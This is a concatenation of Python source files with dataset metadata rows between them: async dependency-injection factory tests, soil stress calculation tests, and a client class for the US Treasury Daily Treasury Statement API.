            {'components': {'foo': {'include': ['foo.'], 'exclude': ['foo.baz']}}, 'default_exclude': ['foo.bar']}
        )
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert select('foo.bar')
        assert not select('foo.baz')

    def test_selector_prefix_ignored(self, sonarqube_check):
        """The 'sonarqube.' prefix is stripped before matching patterns."""
        sq_check = sonarqube_check({'components': {'foo': {'include': ['sonarqube.foo.']}}})
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert select('foo.bar')
        assert not select('bar.baz')
| 39.033175
| 118
| 0.661243
| 918
| 8,236
| 5.680828
| 0.092593
| 0.150336
| 0.120805
| 0.12349
| 0.888974
| 0.878428
| 0.851198
| 0.827613
| 0.773921
| 0.736146
| 0
| 0.005782
| 0.20204
| 8,236
| 210
| 119
| 39.219048
| 0.787736
| 0.013113
| 0
| 0.352941
| 0
| 0
| 0.210118
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.205882
| false
| 0
| 0.014706
| 0
| 0.242647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98ba2c8378867492d657a8949b4f35edfcf1fb65
| 12,227
|
py
|
Python
|
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/providers/async/test_factory_py36.py
|
YelloFam/python-dependency-injector
|
541131e33858ee1b8b5a7590d2bb9f929740ea1e
|
[
"BSD-3-Clause"
] | null | null | null |
"""Factory provider async mode tests."""
import asyncio
from dependency_injector import containers, providers
from pytest import mark, raises
from .common import RESOURCE1, RESOURCE2, Client, Service, BaseContainer, Container, init_resource
@mark.asyncio
async def test_args_injection():
    """Positional injections on a Factory resolve async resources for clients and services."""
    class ContainerWithArgs(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            BaseContainer.resource2,
        )
        service = providers.Factory(
            Service,
            client,
        )

    container = ContainerWithArgs()

    # Two independent builds should both receive the shared resources.
    for made in (await container.client(), await container.client()):
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is RESOURCE2

    services = [await container.service(), await container.service()]
    for made in services:
        assert isinstance(made, Service)
        assert isinstance(made.client, Client)
        assert made.client.resource1 is RESOURCE1
        assert made.client.resource2 is RESOURCE2
    # Factory semantics: each service gets its own client instance.
    assert services[0].client is not services[1].client
@mark.asyncio
async def test_kwargs_injection():
    """Keyword injections declared on the shared `Container` resolve async resources."""
    class ContainerWithKwArgs(Container):
        pass

    container = ContainerWithKwArgs()

    for made in (await container.client(), await container.client()):
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is RESOURCE2

    services = [await container.service(), await container.service()]
    for made in services:
        assert isinstance(made, Service)
        assert isinstance(made.client, Client)
        assert made.client.resource1 is RESOURCE1
        assert made.client.resource2 is RESOURCE2
    # Factory semantics: each service gets its own client instance.
    assert services[0].client is not services[1].client
@mark.asyncio
async def test_context_kwargs_injection():
    """Call-time keyword arguments override the provider's configured injections."""
    override = object()
    container = Container()

    for _ in range(2):
        made = await container.client(resource2=override)
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is override
@mark.asyncio
async def test_args_kwargs_injection():
    """Mixed positional and keyword injections both resolve async resources."""
    class ContainerWithArgsAndKwArgs(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=BaseContainer.resource2,
        )
        service = providers.Factory(
            Service,
            client=client,
        )

    container = ContainerWithArgsAndKwArgs()

    for made in (await container.client(), await container.client()):
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is RESOURCE2

    services = [await container.service(), await container.service()]
    for made in services:
        assert isinstance(made, Service)
        assert isinstance(made.client, Client)
        assert made.client.resource1 is RESOURCE1
        assert made.client.resource2 is RESOURCE2
    # Factory semantics: each service gets its own client instance.
    assert services[0].client is not services[1].client
@mark.asyncio
async def test_async_provider_with_async_injections():
    """An async factory may receive injections produced by another async factory.

    See: https://github.com/ets-labs/python-dependency-injector/issues/368
    """
    async def make_client():
        return {"client": "OK"}

    async def make_service(client):
        return {"service": "OK", "client": client}

    class Container(containers.DeclarativeContainer):
        client = providers.Factory(make_client)
        service = providers.Factory(make_service, client=client)

    container = Container()
    result = await container.service()
    assert result == {"service": "OK", "client": {"client": "OK"}}
@mark.asyncio
async def test_with_awaitable_injection():
    """Resource-provided objects are injected as-is; the factory never awaits them."""
    class GuardedResource:
        # Would explode if the framework (incorrectly) awaited the resolved object.
        def __await__(self):
            raise RuntimeError("Should never happen")

    async def provide_resource():
        yield GuardedResource()

    class Holder:
        def __init__(self, resource) -> None:
            self.resource = resource

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(provide_resource)
        service = providers.Factory(Holder, resource=resource)

    container = Container()
    # Both providers are async here, so calling them returns futures.
    assert isinstance(container.service(), asyncio.Future)
    assert isinstance(container.resource(), asyncio.Future)

    resolved_resource = await container.resource()
    resolved_service = await container.service()

    assert isinstance(resolved_resource, GuardedResource)
    assert isinstance(resolved_service.resource, GuardedResource)
    assert resolved_service.resource is resolved_resource
@mark.asyncio
async def test_with_awaitable_injection_and_with_init_resources_call():
    """Awaitable-looking resources still behave after an explicit `init_resources()`."""
    class GuardedResource:
        # Would explode if the framework (incorrectly) awaited the resolved object.
        def __await__(self):
            raise RuntimeError("Should never happen")

    async def provide_resource():
        yield GuardedResource()

    class Holder:
        def __init__(self, resource) -> None:
            self.resource = resource

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(provide_resource)
        service = providers.Factory(Holder, resource=resource)

    container = Container()
    await container.init_resources()

    # Providers remain async even after eager resource initialization.
    assert isinstance(container.service(), asyncio.Future)
    assert isinstance(container.resource(), asyncio.Future)

    resolved_resource = await container.resource()
    resolved_service = await container.service()

    assert isinstance(resolved_resource, GuardedResource)
    assert isinstance(resolved_service.resource, GuardedResource)
    assert resolved_service.resource is resolved_resource
@mark.asyncio
async def test_injection_error():
    """An exception raised while initializing a resource propagates from the factory call."""
    async def failing_resource():
        raise Exception("Something went wrong")

    class Container(containers.DeclarativeContainer):
        resource_with_error = providers.Resource(failing_resource)
        client = providers.Factory(
            Client,
            resource1=resource_with_error,
            resource2=None,
        )

    container = Container()
    with raises(Exception, match="Something went wrong"):
        await container.client()
@mark.asyncio
async def test_injection_runtime_error_async_provides():
    """An exception raised inside an async provides callable propagates to the caller."""
    async def failing_factory(*args, **kwargs):
        raise Exception("Something went wrong")

    class Container(BaseContainer):
        client = providers.Factory(
            failing_factory,
            resource1=BaseContainer.resource1,
            resource2=None,
        )

    container = Container()
    with raises(Exception, match="Something went wrong"):
        await container.client()
@mark.asyncio
async def test_injection_call_error_async_provides():
    """Injecting kwargs into an async provides callable with no parameters raises TypeError."""
    # NOTE: the function must stay named `create_client` — the assertions below
    # check that this name appears in the TypeError message.
    async def create_client():  # <-- no args defined
        ...

    class Container(BaseContainer):
        client = providers.Factory(
            create_client,
            resource1=BaseContainer.resource1,
            resource2=None,
        )

    container = Container()
    with raises(TypeError) as exception_info:
        await container.client()

    message = str(exception_info.value)
    assert "create_client() got" in message
    assert "unexpected keyword argument" in message
@mark.asyncio
async def test_attributes_injection():
    """Attribute injections added via `add_attributes` resolve async dependencies."""
    class ContainerWithAttributes(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=None,
        )
        client.add_attributes(resource2=BaseContainer.resource2)

        service = providers.Factory(
            Service,
            client=None,
        )
        service.add_attributes(client=client)

    container = ContainerWithAttributes()

    for made in (await container.client(), await container.client()):
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is RESOURCE2

    services = [await container.service(), await container.service()]
    for made in services:
        assert isinstance(made, Service)
        assert isinstance(made.client, Client)
        assert made.client.resource1 is RESOURCE1
        assert made.client.resource2 is RESOURCE2
    # Factory semantics: each service gets its own client instance.
    assert services[0].client is not services[1].client
@mark.asyncio
async def test_attributes_injection_attribute_error():
    """An exception raised by an attribute setter propagates from the factory call."""
    class ClientWithException(Client):
        def _get_attr(self):
            return None

        def _set_attr(self, value):
            raise Exception("Something went wrong")

        # Same contract as the decorator form: readable, but setting always fails.
        attribute_set_error = property(_get_attr, _set_attr)

    class Container(BaseContainer):
        client = providers.Factory(
            ClientWithException,
            resource1=BaseContainer.resource1,
            resource2=BaseContainer.resource2,
        )
        client.add_attributes(attribute_set_error=123)

    container = Container()
    with raises(Exception, match="Something went wrong"):
        await container.client()
@mark.asyncio
async def test_attributes_injection_runtime_error():
    """A failing resource used in attribute injection propagates its error."""
    async def failing_resource():
        raise Exception("Something went wrong")

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(failing_resource)
        client = providers.Factory(
            Client,
            resource1=None,
            resource2=None,
        )
        client.add_attributes(resource1=resource)
        client.add_attributes(resource2=resource)

    container = Container()
    with raises(Exception, match="Something went wrong"):
        await container.client()
@mark.asyncio
async def test_async_instance_and_sync_attributes_injection():
    """Sync attribute injections work alongside an async instance dependency."""
    class ContainerWithAttributes(BaseContainer):
        # `init_resource` here is the helper imported from .common.
        resource1 = providers.Resource(init_resource, providers.Object(RESOURCE1))
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=None,
        )
        client.add_attributes(resource2=providers.Object(RESOURCE2))

        service = providers.Factory(
            Service,
            client=None,
        )
        service.add_attributes(client=client)

    container = ContainerWithAttributes()

    for made in (await container.client(), await container.client()):
        assert isinstance(made, Client)
        assert made.resource1 is RESOURCE1
        assert made.resource2 is RESOURCE2

    services = [await container.service(), await container.service()]
    for made in services:
        assert isinstance(made, Service)
        assert isinstance(made.client, Client)
        assert made.client.resource1 is RESOURCE1
        assert made.client.resource2 is RESOURCE2
    # Factory semantics: each service gets its own client instance.
    assert services[0].client is not services[1].client
| 28.837264
| 98
| 0.705897
| 1,229
| 12,227
| 6.925142
| 0.085435
| 0.075197
| 0.051698
| 0.067207
| 0.839032
| 0.803666
| 0.785219
| 0.755963
| 0.725297
| 0.709787
| 0
| 0.025136
| 0.219105
| 12,227
| 423
| 99
| 28.905437
| 0.866255
| 0.010305
| 0
| 0.757377
| 0
| 0
| 0.023979
| 0
| 0
| 0
| 0
| 0
| 0.308197
| 1
| 0.019672
| false
| 0
| 0.013115
| 0.003279
| 0.17377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f9761ba628e5aca0f223df6b82e7c43f43ecb8f
| 2,911
|
py
|
Python
|
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | null | null | null |
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | null | null | null |
tests/test_stresses.py
|
nickmachairas/edafos
|
10fa39949d44603c3de9a2880c533577ff020567
|
[
"MIT"
] | 1
|
2020-06-10T01:54:43.000Z
|
2020-06-10T01:54:43.000Z
|
from .context import units, SoilProfile
import numpy as np
def case_a():
    """One cohesionless layer (16 ft, tuw=90), water table at 10 ft.

    Returns stresses (total, pore, effective) at 6 ft followed by the same
    triple at 14 ft.
    """
    profile = SoilProfile(unit_system='English', water_table=10)
    profile.add_layer(soil_type='cohesionless', height=16, tuw=90)
    above_wt = profile.calculate_stress(6, kind='all')
    below_wt = profile.calculate_stress(14, kind='all')
    return (*above_wt, *below_wt)
def test_case_a():
    """Verify case A stresses above (6 ft) and below (14 ft) the water table."""
    total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_a()
    ksf = units.kip / units.feet ** 2  # kips per square foot
    assert total_a == 0.540 * ksf
    assert pore_a == 0.000 * ksf
    assert effective_a == 0.540 * ksf
    assert total_b == 1.260 * ksf
    assert pore_b == 0.2496 * ksf
    assert effective_b == 1.0104 * ksf
def case_b():
    """Cohesionless over cohesive layer, water table at 10 ft.

    Returns stresses (total, pore, effective) at 6 ft followed by the same
    triple at 14 ft.
    """
    profile = SoilProfile(unit_system='English', water_table=10)
    profile.add_layer(soil_type='cohesionless', height=5, tuw=90)
    profile.add_layer(soil_type='cohesive', height=11, tuw=110)
    above_wt = profile.calculate_stress(6, kind='all')
    below_wt = profile.calculate_stress(14, kind='all')
    return (*above_wt, *below_wt)
def test_case_b():
    """Verify case B stresses; the 6 ft values are checked to 3 decimal places."""
    total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_b()
    ksf = units.kip / units.feet ** 2  # kips per square foot
    np.testing.assert_almost_equal(total_a.magnitude, 0.560, 3)
    assert total_a.units == ksf
    assert pore_a == 0.000 * ksf
    np.testing.assert_almost_equal(effective_a.magnitude, 0.560, 3)
    assert effective_a.units == ksf
    assert total_b == 1.440 * ksf
    assert pore_b == 0.2496 * ksf
    assert effective_b == 1.1904 * ksf
def case_c():
    """Two thin layers with the water table ABOVE ground surface (-7 ft).

    Returns stresses (total, pore, effective) at -3 ft followed by the same
    triple at 7 ft.
    """
    profile = SoilProfile(unit_system='English', water_table=-7)
    profile.add_layer(soil_type='cohesionless', height=4.5, tuw=90)
    profile.add_layer(soil_type='cohesive', height=4.5, tuw=110)
    above_ground = profile.calculate_stress(-3, kind='all')
    in_soil = profile.calculate_stress(7, kind='all')
    return (*above_ground, *in_soil)
def test_case_c():
    """Verify case C: zero effective stress above ground, mixed checks at 7 ft."""
    total_a, pore_a, effective_a, total_b, pore_b, effective_b = case_c()
    ksf = units.kip / units.feet ** 2  # kips per square foot
    assert total_a == 0.2496 * ksf
    assert pore_a == 0.2496 * ksf
    assert effective_a == 0.000 * ksf
    assert total_b == 1.1168 * ksf
    np.testing.assert_almost_equal(pore_b.magnitude, 0.874, 3)
    assert pore_b.units == ksf
    np.testing.assert_almost_equal(effective_b.magnitude, 0.243, 3)
    assert effective_b.units == ksf
| 41.585714
| 75
| 0.695294
| 479
| 2,911
| 3.979123
| 0.141962
| 0.075551
| 0.12277
| 0.160546
| 0.896642
| 0.883001
| 0.860965
| 0.773872
| 0.767576
| 0.664743
| 0
| 0.055993
| 0.171762
| 2,911
| 69
| 76
| 42.188406
| 0.73455
| 0
| 0
| 0.26
| 0
| 0
| 0.031271
| 0
| 0
| 0
| 0
| 0
| 0.44
| 1
| 0.12
| false
| 0
| 0.04
| 0
| 0.22
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f6bf1add63527bf4a48cbccdbdcb02f5d33b0d9c
| 25,896
|
py
|
Python
|
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 4
|
2021-05-27T01:43:00.000Z
|
2021-11-02T12:16:50.000Z
|
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | null | null | null |
treasury/daily_treasury_statements.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 1
|
2022-01-16T14:59:32.000Z
|
2022-01-16T14:59:32.000Z
|
from typing import Dict
from typing import List
from treasury.session import FederalTreasurySession
class DailyTreasuryStatements():
"""
## Overview:
----
The Daily Treasury Statement (DTS) dataset contains a series of
tables showing the daily cash and debt operations of the U.S.
Treasury. The data includes operating cash balance, deposits and
withdrawals of cash, public debt transactions, federal tax deposits,
income tax refunds issued (by check and electronic funds transfer (EFT)),
short-term cash investments, and issues and redemptions of securities.
All figures are rounded to the nearest million.
"""
def __init__(self, session: FederalTreasurySession) -> None:
    """Initializes the `DailyTreasuryStatements` object.

    ### Parameters
    ----
    session : `TreasurySession`
        An initialized session of the `TreasurySession`.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
    """

    # Keep a handle to the shared API session used by every query method.
    self.treasury_session: FederalTreasurySession = session
def __repr__(self) -> str:
    """String representation of the `FederalTreasuryClient.DailyTreasuryStatements` object."""
    return '<FederalTreasuryClient.DailyTreasuryStatements (active=True, connected=True)>'
def operating_cash_balance(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Operating Cash Balance (DTS Table 1).

    ### Overview
    ----
    This table represents the Treasury General Account balance. Additional
    detail on changes to the Treasury General Account can be found in the
    Deposits and Withdrawals of Operating Cash table. All figures are
    rounded to the nearest million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.operating_cash_balance()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_1',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def deposits_and_withdrawals_operating_cash(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Deposits and Withdrawals of Operating Cash (DTS Table 2).

    ### Overview
    ----
    This table represents deposits and withdrawals from the Treasury
    General Account. A summary of changes to the Treasury General Account
    can be found in the Operating Cash Balance table. All figures are
    rounded to the nearest million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.deposits_and_withdrawals_operating_cash()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_2',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def public_debt_transactions(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Public Debt Transactions (DTS Table 3a).

    ### Overview
    ----
    This table represents the issues and redemption of marketable and
    nonmarketable securities. All figures are rounded to the nearest
    million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.public_debt_transactions()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_3a',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def adjusted_public_debt_transactions(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Adjustment of Public Debt Transactions to Cash Basis (DTS Table 3b).

    ### Overview
    ----
    This table represents cash basis adjustments to the issues and
    redemptions of Treasury securities in the Public Debt Transactions
    table. All figures are rounded to the nearest million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.adjusted_public_debt_transactions()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_3b',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def debt_subject_limit(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Debt Subject to Limit (DTS Table 3c).

    ### Overview
    ----
    This table represents the breakdown of total public debt outstanding
    as it relates to the statutory debt limit. All figures are rounded to
    the nearest million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.debt_subject_limit()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_3c',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def federal_tax_deposits(
    self,
    fields: List[str] = None,
    sort: List[str] = None,
    filters: List[str] = None,
    page_number: int = 1,
    page_size: int = 100
) -> Dict:
    """Queries Federal Tax Deposits (DTS Table 4).

    ### Overview
    ----
    This table represents the breakdown of taxes that are received by the
    federal government. Federal taxes received are represented as deposits
    in the Deposits and Withdrawals of Operating Cash table. All figures
    are rounded to the nearest million.

    ### Parameters
    ----
    fields : List[str] (optional, Default=None)
        Field(s) to include in the response; all fields when omitted.

    sort : List[str] (optional, Default=None)
        Sort order for the response. When omitted, results are sorted by
        the first column listed (typically date, ascending).

    filters : List[str] (optional, Default=None)
        Criteria used to view a subset of the data; all data when omitted.

    page_number : int (optional, Default=1)
        1-based page index used for pagination.

    page_size : int (optional, Default=100)
        Number of rows returned per request.

    ### Returns
    ----
    Dict
        A collection of `Records` resources.

    ### Usage
    ----
        >>> treasury_client = FederalTreasuryClient()
        >>> daily_treasury_service = treasury_client.daily_treasury_statement()
        >>> daily_treasury_service.federal_tax_deposits()
    """

    # The API expects comma-delimited strings; None/empty inputs pass through unchanged.
    return self.treasury_session.make_request(
        method='get',
        endpoint='/v1/accounting/dts/dts_table_4',
        params={
            'format': 'json',
            'page[number]': page_number,
            'page[size]': page_size,
            'fields': ','.join(fields) if fields else fields,
            'sort': ','.join(sort) if sort else sort,
            'filters': ','.join(filters) if filters else filters
        }
    )
def short_term_cash_investments(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Short Term Cash Investments.
### Overview
----
This table represents the amount Treasury has in short-term
cash investments. Deposits and withdrawals of short-term cash
investments are also represented in the Deposits and Withdrawals
of Operating Cash table. This program was suspended indefinitely
in 2008. All figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.short_term_cash_investments()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_5',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def income_tax_refunds_issued(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Income Tax Refunds Issued.
### Overview
----
This table represents the breakdown of tax refunds by recipient
(individual vs business) and type (check vs electronic funds
transfer). Tax refunds are also represented as withdrawals in the
Deposits and Withdrawals of Operating Cash table. All figures are
rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> daily_treasury_service = treasury_client.daily_treasury_statement()
>>> daily_treasury_service.income_tax_refunds_issued()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/dts/dts_table_6',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
| 36.421941
| 108
| 0.581711
| 2,954
| 25,896
| 5.030467
| 0.079215
| 0.022611
| 0.017766
| 0.035532
| 0.865209
| 0.854441
| 0.851952
| 0.843674
| 0.843674
| 0.836541
| 0
| 0.005445
| 0.347544
| 25,896
| 710
| 109
| 36.473239
| 0.874053
| 0.615848
| 0
| 0.817778
| 0
| 0
| 0.106622
| 0.040544
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.013333
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6e6f99fa71eb56a8b9f37976822b41e75d44b49
| 8,066
|
py
|
Python
|
tests/cli/command/test_create.py
|
MediaMath/lambda-cron
|
2545e9fdeced7ebeaba2f98d02891cc6db7546e2
|
[
